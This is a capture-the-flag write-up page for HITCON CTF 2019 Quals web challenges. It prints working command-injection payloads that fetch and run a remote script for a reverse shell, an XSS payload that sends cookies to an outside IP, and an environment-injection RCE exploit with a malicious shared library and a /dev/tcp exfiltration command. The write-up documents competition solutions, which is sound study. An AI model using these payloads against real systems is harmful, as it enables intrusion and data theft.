index.html

<!DOCTYPE HTML>
<!-- This page is modified from the template https://www.codeply.com/go/7XYosZ7VH5 by Carol Skelly (@iatek). -->
<html>
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>HITCON CTF 2019 Quals</title>
    <link type="text/css" rel="stylesheet" href="../assets/css/github-markdown.css">
    <link type="text/css" rel="stylesheet" href="../assets/css/pilcrow.css">
    <link type="text/css" rel="stylesheet" href="../assets/css/hljs-github.min.css"/>
    <link type="text/css" rel="stylesheet" href="../assets/css/bootstrap-4.0.0-beta.3.min.css">
    <script type="text/javascript" src="../assets/js/jquery-3.3.1.slim.min.js"></script>
    <script type="text/javascript" src="../assets/js/bootstrap-4.0.0-beta.3.min.js"></script>
    <script type="text/javascript" src="../assets/js/popper-1.14.3.min.js"></script>
    <script type="text/javascript" src="../assets/js/mathjax-2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
  </head>
  <style>
  body {
      padding-top: 56px;
  }

  .sticky-offset {
      top: 56px;
  }

  #body-row {
      margin-left:0;
      margin-right:0;
  }
  #sidebar-container {
      min-height: 100vh;   
      background-color: #333;
      padding: 0;
  }

  /* Sidebar sizes when expanded and expanded */
  .sidebar-expanded {
      width: 230px;
  }
  .sidebar-collapsed {
      width: 60px;
  }

  /* Menu item*/
  #sidebar-container .list-group a {
      height: 50px;
      color: white;
  }

  /* Submenu item*/
  #sidebar-container .list-group .sidebar-submenu a {
      height: 45px;
      padding-left: 60px;
  }
  .sidebar-submenu {
      font-size: 0.9rem;
  }

  /* Separators */
  .sidebar-separator-title {
      background-color: #333;
      height: 35px;
  }
  .sidebar-separator {
      background-color: #333;
      height: 25px;
  }
  .logo-separator {
      background-color: #333;    
      height: 60px;
  }


  /* 
   active scrollspy
  */
  .list-group-item.active {
    border-color: transparent;
    border-left: #e69138 solid 4px;
  }

  /* 
   anchor padding top
   https://stackoverflow.com/a/28824157
  */
  :target:before {
    content:"";
    display:block;
    height:56px; /* fixed header height*/
    margin:-56px 0 0; /* negative fixed header height */
  }
  </style>
  
  <script>
  // https://stackoverflow.com/a/48330533
  $(window).on('activate.bs.scrollspy', function (event) {
    let active_collapse = $($('.list-group-item.active').parents()[0]);
    $(".collapse").removeClass("show");
    active_collapse.addClass("show");

    let parent_menu = $('a[href="#' + active_collapse[0].id + '"]');
    $('a[href^="#submenu"]').css("border-left", "");
    parent_menu.css("border-left","#e69138 solid 4px");
  });

  // http://docs.mathjax.org/en/latest/tex.html#tex-and-latex-math-delimiters
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [['$','$'], ['\\(','\\)']],
      processEscapes: true
    }
  });
  </script>

  <body style="position: relative;" data-spy="scroll" data-target=".sidebar-submenu" data-offset="70">
    <nav class="navbar navbar-expand-md navbar-light bg-light fixed-top">
      <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>
      <a class="navbar-brand" href="https://github.com/balsn/ctf_writeup">
        <img src="https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png" class="d-inline-block align-top" alt="" width="30" height="30">
        <span class="menu-collapsed">balsn / ctf_writeup</span>
      </a>
      <div class="collapse navbar-collapse" id="navbarNavDropdown">
        <ul class="navbar-nav my-2 my-lg-0">
            
            <li class="nav-item dropdown d-sm-block d-md-none">
              <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=watch&count=true&size=large&v=2" frameborder="0" scrolling="0" width="140px" height="30px"></iframe>
              <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=star&count=true&size=large" frameborder="0" scrolling="0" width="140px" height="30px"></iframe>
        
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                web
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#virtual-public-network">virtual-public-network</a>
    
                <a class="dropdown-item" href="#bounty-pl33z">bounty-pl33z</a>
    
                <a class="dropdown-item" href="#gogo-powersql">gogo-powersql</a>
    
                <a class="dropdown-item" href="#luatic">luatic</a>
    
                <a class="dropdown-item" href="#buggy-.net">buggy-.net</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                pwn
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#poe---i">poe---i</a>
    
                <a class="dropdown-item" href="#emojiiivm">emojiiivm</a>
    
                <a class="dropdown-item" href="#netatalk">netatalk</a>
    
                <a class="dropdown-item" href="#🎃-trick-or-treat-🎃">🎃-trick-or-treat-🎃</a>
    
                <a class="dropdown-item" href="#lazyhouse">lazyhouse</a>
    
                <a class="dropdown-item" href="#one-punch-man">one-punch-man</a>
    
                <a class="dropdown-item" href="#crypto-in-the-shell">crypto-in-the-shell</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                misc
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#revenge-of-welcome">revenge-of-welcome</a>
    
                <a class="dropdown-item" href="#ev3-player">ev3-player</a>
    
                <a class="dropdown-item" href="#hexdump">hexdump</a>
    
                <a class="dropdown-item" href="#emojivm">emojivm</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                rev
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#ev3-arm">ev3-arm</a>
    
                <a class="dropdown-item" href="#emojivm-1">emojivm-1</a>
    
                <a class="dropdown-item" href="#core-dumb">core-dumb</a>
    
                <a class="dropdown-item" href="#suicune">suicune</a>
    
              </div>
            </li>
    
            <li class="nav-item dropdown d-sm-block d-md-none">
              <a class="nav-link dropdown-toggle" href="#" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                crypto
              </a>
              <div class="dropdown-menu" aria-labelledby="smallerscreenmenu">
                                <a class="dropdown-item" href="#lost-modulus-again">lost-modulus-again</a>
    
                <a class="dropdown-item" href="#lost-key-again">lost-key-again</a>
    
                <a class="dropdown-item" href="#very-simple-haskell">very-simple-haskell</a>
    
              </div>
            </li>
    
        </ul>
      </div>
      <div class="navbar-collapse collapse w-100 order-3 dual-collapse2">
        <ul class="navbar-nav ml-auto">
          <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=watch&count=true&size=large&v=2" frameborder="0" scrolling="0" width="160px" height="30px"></iframe>
          <iframe src="https://ghbtns.com/github-btn.html?user=balsn&repo=ctf_writeup&type=star&count=true&size=large" frameborder="0" scrolling="0" width="160px" height="30px"></iframe>
        </ul>
      </div>
    </nav>
    <div class="row" id="body-row">
      <div id="sidebar-container" class="sidebar-expanded d-none d-md-block col-2">
        <ul class="list-group sticky-top sticky-offset">
          
          <a href="#submenu0" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">web</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu0" class="collapse sidebar-submenu">
            <a href="#virtual-public-network" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">virtual-public-network</span>
            </a>
    
<a href="#bounty-pl33z" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">bounty-pl33z</span>
            </a>
    
<a href="#gogo-powersql" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">gogo-powersql</span>
            </a>
    
<a href="#luatic" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">luatic</span>
            </a>
    
<a href="#buggy-.net" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">buggy-.net</span>
            </a>
    
          </div>
    
          <a href="#submenu1" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">pwn</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu1" class="collapse sidebar-submenu">
            <a href="#poe---i" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">poe---i</span>
            </a>
    
<a href="#emojiiivm" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">emojiiivm</span>
            </a>
    
<a href="#netatalk" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">netatalk</span>
            </a>
    
<a href="#🎃-trick-or-treat-🎃" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">🎃-trick-or-treat-🎃</span>
            </a>
    
<a href="#lazyhouse" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">lazyhouse</span>
            </a>
    
<a href="#one-punch-man" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">one-punch-man</span>
            </a>
    
<a href="#crypto-in-the-shell" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">crypto-in-the-shell</span>
            </a>
    
          </div>
    
          <a href="#submenu2" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">misc</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu2" class="collapse sidebar-submenu">
            <a href="#revenge-of-welcome" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">revenge-of-welcome</span>
            </a>
    
<a href="#ev3-player" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">ev3-player</span>
            </a>
    
<a href="#hexdump" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">hexdump</span>
            </a>
    
<a href="#emojivm" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">emojivm</span>
            </a>
    
          </div>
    
          <a href="#submenu3" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">rev</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu3" class="collapse sidebar-submenu">
            <a href="#ev3-arm" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">ev3-arm</span>
            </a>
    
<a href="#emojivm-1" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">emojivm-1</span>
            </a>
    
<a href="#core-dumb" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">core-dumb</span>
            </a>
    
<a href="#suicune" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">suicune</span>
            </a>
    
          </div>
    
          <a href="#submenu4" data-toggle="collapse" aria-expanded="false" class="list-group-item list-group-item-action flex-column align-items-start bg-dark">
            <div class="d-flex w-100 justify-content-start align-items-center font-weight-bold">
              <span class="fa fa-dashboard fa-fw mr-3"></span>
              <span class="menu-collapsed">crypto</span>
              <span class="submenu-icon ml-auto"></span>
            </div>
          </a>
          <div id="submenu4" class="collapse sidebar-submenu">
            <a href="#lost-modulus-again" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">lost-modulus-again</span>
            </a>
    
<a href="#lost-key-again" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">lost-key-again</span>
            </a>
    
<a href="#very-simple-haskell" class="list-group-item list-group-item-action text-white bg-dark">
              <span class="menu-collapsed">very-simple-haskell</span>
            </a>
    
          </div>
    
        </ul>
      </div>
      <div class="col-10 py-3">
        <article class="markdown-body"><h1 id="hitcon-ctf-2019-quals"><a class="header-link" href="#hitcon-ctf-2019-quals"></a>HITCON CTF 2019 Quals</h1>

<h2 id="web"><a class="header-link" href="#web"></a>Web</h2>
<h3 id="virtual-public-network"><a class="header-link" href="#virtual-public-network"></a>Virtual Public Network</h3>
<p><code>-r$x=&quot;wget kaibro.tw/yy -O /tmp/kaibro&quot;,system$x# 2&gt;./tmp/kaibro.thtml &lt;</code></p>
<p><code>-r$x=&quot;sh /tmp/kaibro&quot;,system$x# 2&gt;./tmp/kaibro.thtml &lt;</code></p>
<p>then get reverse shell back.</p>
<p><code>/$READ_FLAG$</code></p>
<p>=&gt; <code>hitcon{Now I&#39;m sure u saw my Bl4ck H4t p4p3r :P}</code></p>
<h3 id="bounty-pl33z"><a class="header-link" href="#bounty-pl33z"></a>Bounty Pl33z</h3>
<p>This is a XSS challenge. The source code is <a href="https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2019/bounty-pl33z/www/fd.php">here</a>. For quotes, if they appear more than once, they will be removed.</p>
<p>The most tricky part is if the string we inject includes a double quote. For example, <code>&quot;+alert(1)</code></p>
<pre class="hljs"><code><span class="hljs-title">window</span>.parent.postMessage(
                <span class="hljs-class"><span class="hljs-keyword">data</span>, </span>
<span class="hljs-string">"https://"</span>+alert(<span class="hljs-number">1</span>)<span class="hljs-string">".orange.ctf"</span>
);</code></pre><p>Undoubtedly the <code>orange.ctf&quot;</code> will throw syntax error.</p>
<p>At that time, I could not come out of any useful payload to comment out <code>orange.ctf&quot;</code>. Therefore I decided to fuzz/brute-force 3 characters:</p>
<pre class="hljs"><code>  <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">128</span>; j++) {
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> k = <span class="hljs-number">0</span>; k &lt; <span class="hljs-number">128</span>; k++) {
      <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> l = <span class="hljs-number">0</span>; l &lt; <span class="hljs-number">128</span>; l++) {
        <span class="hljs-keyword">if</span> (j == <span class="hljs-number">34</span> || k ==<span class="hljs-number">34</span> || l ==<span class="hljs-number">34</span>)
          <span class="hljs-keyword">continue</span>;
        <span class="hljs-keyword">if</span> (j == <span class="hljs-number">0x0a</span> || k ==<span class="hljs-number">0x0a</span> || l ==<span class="hljs-number">0x0a</span>)
          <span class="hljs-keyword">continue</span>;
        <span class="hljs-keyword">if</span> (j == <span class="hljs-number">0x0d</span> || k ==<span class="hljs-number">0x0d</span> || l ==<span class="hljs-number">0x0d</span>)
          <span class="hljs-keyword">continue</span>;
        <span class="hljs-keyword">if</span> (j == <span class="hljs-number">0x3c</span> || k ==<span class="hljs-number">0x3c</span> || l ==<span class="hljs-number">0x3c</span>)
          <span class="hljs-keyword">continue</span>;
        <span class="hljs-keyword">if</span> (
           (j == <span class="hljs-number">47</span> &amp;&amp; k == <span class="hljs-number">47</span>)
           ||(k == <span class="hljs-number">47</span> &amp;&amp; l == <span class="hljs-number">47</span>)
          )
          <span class="hljs-keyword">continue</span>;
    <span class="hljs-keyword">try</span> {
        <span class="hljs-keyword">var</span> cmd = <span class="hljs-built_in">String</span>.fromCharCode(j) + <span class="hljs-built_in">String</span>.fromCharCode(k) + <span class="hljs-built_in">String</span>.fromCharCode(l) + <span class="hljs-string">'a.orange.ctf"'</span>;
        <span class="hljs-built_in">eval</span>(cmd);
    } <span class="hljs-keyword">catch</span>(e) {
        <span class="hljs-keyword">var</span> err = e.toString().split(<span class="hljs-string">'\n'</span>)[<span class="hljs-number">0</span>].split(<span class="hljs-string">':'</span>)[<span class="hljs-number">0</span>];
        <span class="hljs-keyword">if</span> (err === <span class="hljs-string">'SyntaxError'</span> || err === <span class="hljs-string">"ReferenceError"</span>)
          <span class="hljs-keyword">continue</span>
        err = e.toString().split(<span class="hljs-string">'\n'</span>)[<span class="hljs-number">0</span>]
    }
       <span class="hljs-built_in">console</span>.log(err,cmd);
    }
    }
  }</code></pre><p>The output really surprised me. The following are all valid js comment syntax:</p>
<pre class="hljs"><code><span class="hljs-meta">#!a.orange.ctf"</span>
--&gt;a.orange.ctf<span class="hljs-string">"</span></code></pre><p>The first <a href="https://github.com/tc39/proposal-hashbang">shebang syntax</a> has to be in the start of the js, which means it is not very useful in this challenge.</p>
<p>However, the second one is interesting. This seems to be <a href="https://www.ecma-international.org/ecma-262/10.0/index.html#prod-annexB-HTMLCloseComment">a valid comment syntax</a> in ECMA. Well.... it&#39;s javascript!</p>
<p>There is still one problem. The <code>--&gt;</code> comment syntax must be the start of the line, but <code>\n\r</code> are all filtered. I start to wonder there exists an unicode newline or not, and I find this <a href="https://stackoverflow.com/questions/50156996/replace-n-with-unicode-to-display-new-line-in-html-correctly">stackoverflow</a> post.</p>
<p>Anyway, let&#39;s fuzz/brute-force again!</p>
<pre class="hljs"><code>  <span class="hljs-keyword">for</span> (<span class="hljs-keyword">let</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">65536</span>; j++) {
    <span class="hljs-keyword">try</span> {
        <span class="hljs-keyword">var</span> cmd = <span class="hljs-string">'"aaaaa";'</span>+<span class="hljs-built_in">String</span>.fromCharCode(j) + <span class="hljs-string">'--&gt;a.orange.ctf"'</span>;
        <span class="hljs-built_in">eval</span>(cmd);
    } <span class="hljs-keyword">catch</span>(e) {
        <span class="hljs-keyword">var</span> err = e.toString().split(<span class="hljs-string">'\n'</span>)[<span class="hljs-number">0</span>].split(<span class="hljs-string">':'</span>)[<span class="hljs-number">0</span>];
        <span class="hljs-keyword">if</span> (err === <span class="hljs-string">'SyntaxError'</span> || err === <span class="hljs-string">"ReferenceError"</span>)
          <span class="hljs-keyword">continue</span>;
        err = e.toString().split(<span class="hljs-string">'\n'</span>)[<span class="hljs-number">0</span>]
    }
    <span class="hljs-built_in">console</span>.log(<span class="hljs-string">`[<span class="hljs-subst">${err}</span>]`</span>,j,cmd);
  }</code></pre><p><code>charCode(8233)</code> and <code>charCode(8233)</code> will be parsed as newline in javascript.</p>
<p>This payload can pop an alert: <code>http://3.114.5.202/fd.php?q=&quot;%2balert(1)%e2%80%a8--&gt;</code></p>
<p>The final payload:</p>
<pre class="hljs"><code>http:<span class="hljs-regexp">//</span><span class="hljs-number">3.114</span>.<span class="hljs-number">5.202</span>/fd.php?<span class="hljs-keyword">q</span>=%22%2bfetch(atob(<span class="hljs-string">`Ly8xMzMuMjIxLjMzMy4xMjM6MTIzNC8/YT0K`</span>)%2bbtoa(document%5B%60cookie%60%5D))%e2%80%a8--%3E</code></pre><p>The flag is <code>hitcon{/FD 1s 0ur g0d &lt;(_ _)&gt;}</code>.</p>
<p>Actually, I was also playing with parentheses and template literal (backtick), but I failed to create a successful payload. To my surprise, there is actually an unintended solution exploiting parentheses. Check out <a href="https://twitter.com/terjanq/status
/1183633977455861760">terjanq&#39;s</a> payload, or <a href="https://github.com/orangetw/My-CTF-Web-Challenges#unintended-solution">this one</a>.</p>
<p>Fun fact: The idea seems to be from a challenge in <a href="https://github.com/cure53/XSSChallengeWiki/wiki/prompt.ml#level-8">Cure53 XSS wiki</a>, and the first author <a href="https://twitter.com/filedescriptor">filedescriptor (fd)</a> is working in Cure53.</p>
<h3 id="gogo-powersql"><a class="header-link" href="#gogo-powersql"></a>GoGo PowerSQL</h3>
<p>The sever is running <a href="https://github.com/embedthis/goahead">GoAhead v4.0.0</a> + CGI + mysql. The CGI program will read MySQL host ip from a config file, and there is a BSS overflow which we can overwrite the MySQL host ip. However, the characters are limited in alphabets only. Therefore we decided to exploit the webserver itself.</p>
<p>We checked the <a href="https://github.com/embedthis/goahead/issues/262">CVE-2017-17562</a> on older GoAhead webservers. There is also a <a href="https://www.elttam.com.au/blog/goahead/">good article</a> describing this vulnerability. Although it&#39;s fixed on 4.0.0, reading it should help me exploit this webserver. Surprising we found &quot;the fix&quot; was just <a href="https://github.com/embedthis/goahead/blob/32deeb00a106f3d1a7bdc21671123d97f05378b6/src/cgi.c#L168-L177">filtering a bunch of sensitive environment variables</a>.</p>
<p>However, the CGI executable uses <code>libmysqlclient</code>. It&#39;s possible that we can pollute some environment variable to reach RCE via mysql library. After browsing the <a href="https://dev.mysql.com/doc/refman/5.7/en/environment-variables.html">MySQL 5.7 doc</a>, one of them catches my eyes.</p>
<pre class="hljs"><code>LIBMYSQL_PLUGINS     Client plugins <span class="hljs-keyword">to</span> preload.</code></pre><p>And it turns out that it can load <code>.so</code> library as plugins. I quickly made a simple RCE hook in C:</p>
<pre class="hljs"><code><span class="hljs-comment">// gcc -shared -fPIC cmd.c -o cmd.so</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> _GNU_SOURCE</span>

<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdlib.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;string.h&gt;</span></span>


<span class="hljs-keyword">extern</span> <span class="hljs-keyword">char</span>** environ;

__attribute__ ((__constructor__)) <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">preload</span> <span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>{
    system(getenv(<span class="hljs-string">"CMD"</span>));
}</code></pre><p>We can easily RCE through the commands. Basically it&#39;s similar to <code>LD_PRELOAD</code>.</p>
<pre class="hljs"><code><span class="hljs-keyword">CMD</span><span class="bash">=<span class="hljs-string">"yes"</span> LIBMYSQL_PLUGIN_DIR=`<span class="hljs-built_in">pwd</span>` LIBMYSQL_PLUGINS=<span class="hljs-string">"cmd.so"</span> QUERY_STRING=<span class="hljs-string">"name=a"</span> ./query</span></code></pre><p>(<code>QUERY_STRING</code> is the GET parmeters passing to the CGI executable <code>query</code>)</p>
<p>Also, based on the exploit of <a href="https://www.elttam.com.au/blog/goahead/">CVE-2017-17562</a>, we could probably use <code>/proc/self/fd/0</code> to upload our malicious library.</p>
<p>However, MySQL library will always append <code>.so</code> on the name of plugins. So if the plugin is named <code>foo</code>, it will load <code>foo.so</code> from the directory specified. We stuck here for a few hours and we can&#39;t find a way to bypass this.</p>
<p>Until I read <a href="https://github.com/mysql/mysql-server/blob/4869291f7ee258e136ef03f5a50135fe7329ffb9/sql-common/client_plugin.cc#L442">mysql source code</a>:</p>
<pre class="hljs"><code><span class="hljs-keyword">int</span> FN_REFLEN = <span class="hljs-number">512</span>;
<span class="hljs-keyword">char</span> dlpath[FN_REFLEN + <span class="hljs-number">1</span>];
strxnmov(dlpath, <span class="hljs-keyword">sizeof</span>(dlpath) - <span class="hljs-number">1</span>, plugindir, <span class="hljs-string">"/"</span>, name, <span class="hljs-string">".so"</span>, NullS);

<span class="hljs-function"><span class="hljs-keyword">char</span> *<span class="hljs-title">strxnmov</span><span class="hljs-params">(<span class="hljs-keyword">char</span> *dst, <span class="hljs-keyword">size_t</span> len, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *src, ...)</span> </span>{
  va_list pvar;
  <span class="hljs-keyword">char</span> *end_of_dst = dst + len;

  va_start(pvar, src);
  <span class="hljs-keyword">while</span> (src != NullS) {
    <span class="hljs-keyword">do</span> {
      <span class="hljs-keyword">if</span> (dst == end_of_dst) <span class="hljs-keyword">goto</span> end;
    } <span class="hljs-keyword">while</span> ((*dst++ = *src++));
    dst--;
    src = va_arg(pvar, <span class="hljs-keyword">char</span> *);
  }
end:
  *dst = <span class="hljs-number">0</span>;
  va_end(pvar);
  <span class="hljs-keyword">return</span> dst;
}</code></pre><p>Thanks to this, if the filepath is more than 512 bytes, <code>.so</code> will get truncated.</p>
<pre class="hljs"><code>curl -X POST --data-binary @.<span class="hljs-regexp">/cmd.so 'http:/</span><span class="hljs-regexp">/13.231.38.172/</span>cgi-bin<span class="hljs-regexp">/query?LIBMYSQL_PLUGIN_DIR=/</span><span class="hljs-regexp">/proc/</span>self<span class="hljs-regexp">/fd&amp;LIBMYSQL_PLUGINS=./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/0&amp;CMD=bash%20-c%20%22cat%20/</span>F*&gt;<span class="hljs-regexp">/dev/</span>tcp<span class="hljs-regexp">/133.221.333.123/</span><span class="hljs-number">12345</span>%<span class="hljs-number">22</span><span class="hljs-string">'</span></code></pre><p>The flag: <code>hitcon{Env1r0nm3nt 1nj3ct10n r0cks!!!}</code></p>
<p>This seems to be the unintended RCE solution (I knew some other teams also developed this exploit.). According to <a href="https://github.com/orangetw/My-CTF-Web-Challenges#gogo-powersql">the author&#39;s writeup (Orange)</a>, the intended way is polluting <code>LOCALDOMAIN</code> and overwriting mysql host to read arbitrary file from the client using a rogue MySQL server.</p>
<p>Everything is possible if you check the source code.</p>
